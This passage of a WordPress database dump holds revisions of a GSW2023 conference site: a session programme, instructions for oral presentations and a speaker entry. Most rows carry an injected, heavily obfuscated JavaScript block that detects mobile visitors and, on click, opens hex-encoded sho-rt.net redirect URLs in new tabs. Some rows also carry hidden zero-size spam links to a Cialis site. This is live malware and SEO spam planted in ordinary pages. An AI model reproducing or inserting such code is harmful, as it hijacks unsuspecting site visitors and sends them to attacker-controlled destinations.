_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Programme','','inherit','closed','closed','','5122-revision-v1','','','2023-08-18 10:45:58','2023-08-18 10:45:58','',5122,'https://gsw2023.com/?p=5331',0,'revision','',0),
(5332,0,'2023-08-18 10:45:59','2023-08-18 10:45:59','<span style=\"font-size: 12pt;\"><strong>Preparing the presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare the presentation, please keep in mind that:</strong></span>\r\n\r\n All projectors can handle 16:9 aspect ratio (Extron scaler).\r\n The time slot for oral presentations varies from 18 to 22 min depending on decisions by the\r\nworkshop chairs on the session contents. To find the time available for your presentation, please\r\nlocate your session on the GSW2023 program and check the abstract of your session page.\r\n Please leave some 3-5 minutes of your time slot available for questions and time to switch to the\r\nnext presentation.\r\n The oral presentation will be accurately timed, so make sure you will finish nicely in time. The\r\nchair of the session will stand up when you have 1 min left, and come standing next to you if you\r\ndo not finish in time.\r\n There is no official GSW 2023 presentation template, please use a template from your home\r\nuniversity / institution.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>At the GSW2023</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>The day of your presentation you should consider that:</strong></span>\r\n\r\n For a smooth progress of the session we ask the presenting author to be in the session room 15\r\nminutes before the session starts (not your own talk, but the session) and announce your\r\npresence to the local organizers in the room and the chairs of that session.\r\n Please bring a USB stick with your presentation (PowerPoint or PDF) and upload it before the\r\nsession starts on the PC available in the room of your session.\r\n In each session, a single conference PC is used for all presentations.\r\n The PC is a Windows <span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>notebook, with the following software: Adobe Acrobat Reader, Microsoft\r\nPowerPoint, and VLC media player.\r\n If you are using video in your presentation, please check whether it correctly runs 15 minutes\r\nbefore the session starts.\r\n Presenters also have the possibility to use their own laptop for their presentation, if they want to\r\nuse that instead, e.g. for running software demos. Please check the laptop connection to the\r\nprojector 15 minutes before the session starts. All rooms offer three laptop connections: HDMI,\r\nVGA and mini DisplayPort (for Mac). Specific Mac-adapters are NOT available in the rooms and\r\nneed to be brought by yourself.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Further information</strong></span>\r\n\r\nPower usage (if you are preparing e.g. in a hotel): Note that in Egypt the mains have an AC voltage of 220 Volts, at\r\n50 Hz. The used power sockets are of types C and F. (grounded, also compatible with C and E, see\r\nlink:<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> https://www.power-plugs-sockets.com/egypt/ . We will supply extension cords, but will not supply power\r\nplug adapters.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','INSTRUCTIONS FOR ORAL PRESENTATIONS','','inherit','closed','closed','','5139-revision-v1','','','2023-08-18 10:45:59','2023-08-18 10:45:59','',5139,'https://gsw2023.com/?p=5332',0,'revision','',0),
(5334,1,'2023-08-18 19:29:15','2023-08-18 19:29:15','<!-- wp:paragraph -->\n<p><strong>Prof. Deren Li, Chinese Academy of Sciences and the Chinese Academy of Engineering</strong></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\"> </p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 